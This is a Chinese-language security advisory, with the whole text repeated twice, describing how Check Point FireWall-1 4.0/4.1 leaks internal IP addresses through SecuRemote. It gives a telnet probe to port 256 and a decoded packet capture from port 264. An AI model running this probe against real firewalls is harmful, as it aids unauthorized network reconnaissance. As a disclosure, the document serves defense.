Check Point FireWall-1 4.0和4.1(SP5之前)包含SecuRemote允许移动用户使用加密和验证会话连接内部网络。 在SecuRemote和Firewall-1初始化非加密通信阶段,发送的分组包含防火墙的所有IP地址,包括关联的内部接口,攻击者因此可以通过嗅探获得内部IP地址信息。 在IRM的测试过程中,Check Point Firewall-1设备上的内部IP地址会被泄露。通过telnet连接Firewall-1 4.0和4.1版本的256 TCP端口,输入下列字符: aa<CR> aa<CR> 防火墙的IP地址就会以二进制形式返回。 另外,当使用SecuRemote连接防火墙的TCP 264端口,如果使用包嗅探器截获数据传输,就可以看到类似如下的IP地址信息: 15:45:44.029883 192.168.1.1.264 > 10.0.0.1.1038: P 5:21(16) ack 17 win 8744 (DF) 0x0000 4500 0038 a250 4000 6e06 5b5a ca4d b102 E..8.P@.n.[Z.M.. 0x0010 5102 42c3 0108 040e 1769 fb25 cdc0 8a36 Q.B......i.\\%...6 0x0020 5018 2228 fa32 0000 0000 000c c0a8 0101 P.\"(.2.......M.. 0x0030 c0a8 0a01 c0a8 0e01 ........ c0a8 0101 = 192.168.1.1 c0a8 0a01 = 192.168.10.1 c0a8 0e01 = 192.168.14.1
Check Point FireWall-1 4.0和4.1(SP5之前)包含SecuRemote允许移动用户使用加密和验证会话连接内部网络。 在SecuRemote和Firewall-1初始化非加密通信阶段,发送的分组包含防火墙的所有IP地址,包括关联的内部接口,攻击者因此可以通过嗅探获得内部IP地址信息。 在IRM的测试过程中,Check Point Firewall-1设备上的内部IP地址会被泄露。通过telnet连接Firewall-1 4.0和4.1版本的256 TCP端口,输入下列字符: aa<CR> aa<CR> 防火墙的IP地址就会以二进制形式返回。 另外,当使用SecuRemote连接防火墙的TCP 264端口,如果使用包嗅探器截获数据传输,就可以看到类似如下的IP地址信息: 15:45:44.029883 192.168.1.1.264 > 10.0.0.1.1038: P 5:21(16) ack 17 win 8744 (DF) 0x0000 4500 0038 a250 4000 6e06 5b5a ca4d b102 E..8.P@.n.[Z.M.. 0x0010 5102 42c3 0108 040e 1769 fb25 cdc0 8a36 Q.B......i.\\%...6 0x0020 5018 2228 fa32 0000 0000 000c c0a8 0101 P.\"(.2.......M.. 0x0030 c0a8 0a01 c0a8 0e01 ........ c0a8 0101 = 192.168.1.1 c0a8 0a01 = 192.168.10.1 c0a8 0e01 = 192.168.14.1